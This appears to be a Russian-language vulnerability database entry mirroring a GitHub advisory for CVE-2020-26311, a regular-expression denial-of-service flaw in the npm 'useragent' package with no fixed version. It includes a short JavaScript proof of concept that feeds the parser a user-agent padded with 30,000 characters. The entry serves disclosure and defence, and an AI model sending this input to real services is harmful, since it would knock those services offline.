GHSA-mgfv-m47x-4wqp

Опубликовано: 26 окт. 2024

Источник: github

Github: Прошло ревью

CVSS4: 6.6

CVSS3: 7.5

Описание

useragent Regular Expression Denial of Service vulnerability

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS).

PoC

async function exploit() { const useragent = require(\"useragent\"); // Create a malicious user-agent that leads to excessive backtracking const maliciousUserAgent = 'Mozilla/5.0 (' + 'X'.repeat(30000) + ') Gecko/20100101 Firefox/77.0'; // Parse the malicious user-agent const agent = useragent.parse(maliciousUserAgent); // Call the toString method to trigger the vulnerability const result = await agent.device.toString(); console.log(result); } await exploit();

Ссылки

Пакеты

Наименование

useragent

npm

Затронутые версииВерсия исправления

<= 2.3.0

Отсутствует

EPSS

Процентиль: 32%

0.00122

Низкий

6.6 Medium

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2020-26311

Дефекты

CWE-1333

Связанные уязвимости

CVE-2020-26311

CVSS3: 7.5

redhat

больше 1 года назад

Useragent is a user agent parser for Node.js. All versions as of time of publication contain one or more regular expressions that are vulnerable to Regular Expression Denial of Service (ReDoS). As of time of publication, no patches are available.

CVE-2020-26311

CVSS3: 7.5

nvd

больше 1 года назад

EPSS

Процентиль: 32%

0.00122

Низкий

6.6 Medium

CVSS4

7.5 High

CVSS3

CVE ID

CVE-2020-26311

Дефекты

CWE-1333